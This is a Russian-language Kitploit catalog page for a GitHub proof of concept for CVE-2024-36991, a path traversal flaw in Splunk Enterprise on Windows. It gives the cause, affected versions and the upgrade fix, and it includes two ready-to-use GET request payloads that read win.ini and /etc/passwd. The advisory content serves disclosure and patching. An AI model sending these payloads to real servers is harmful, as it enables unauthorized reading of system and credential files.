Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/mr-xn/cve-2024-36991
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubmr-xn/cve-2024-36991

CVE-2024-36991

Обход пути в конечной точке "/Modules/Messaging/" в Splunk Enterprise в Windows

Репозиторий
9122 лет назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-36991

Обход пути в конечной точке «/Modules/Messaging/» в Splunk Enterprise на Windows

В Splunk Enterprise версиях ниже 9.2.2, 9.1.5 и 9.0.10 злоумышленник может выполнить обход пути в конечной точке /modules/messaging/ в Splunk Enterprise на Windows.

Уязвимость существует из-за того, что функция Python os.path.join удаляет букву диска из элементов пути, если диск в элементе совпадает с диском в создаваемом пути.

Эта уязвимость должна затрагивать только Splunk Enterprise на Windows.

POC

root@kitploit:~
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd

Затронутые версии

  • затронуты версии от 9.2 до 9.2.2

  • затронуты версии от 9.1 до 9.1.5

  • затронуты версии от 9.0 до 9.0.10

Решение

Обновите Splunk Enterprise до версий 9.2.2, 9.1.5 и 9.0.10 или выше.

Авторы

Danylo Dmytriiev (DDV_UA)

Ссылки

  • https://advisory.splunk.com/advisories/SVD-2024-0711
  • https://www.cve.org/CVERecord?id=CVE-2024-36991
Скачать инструмент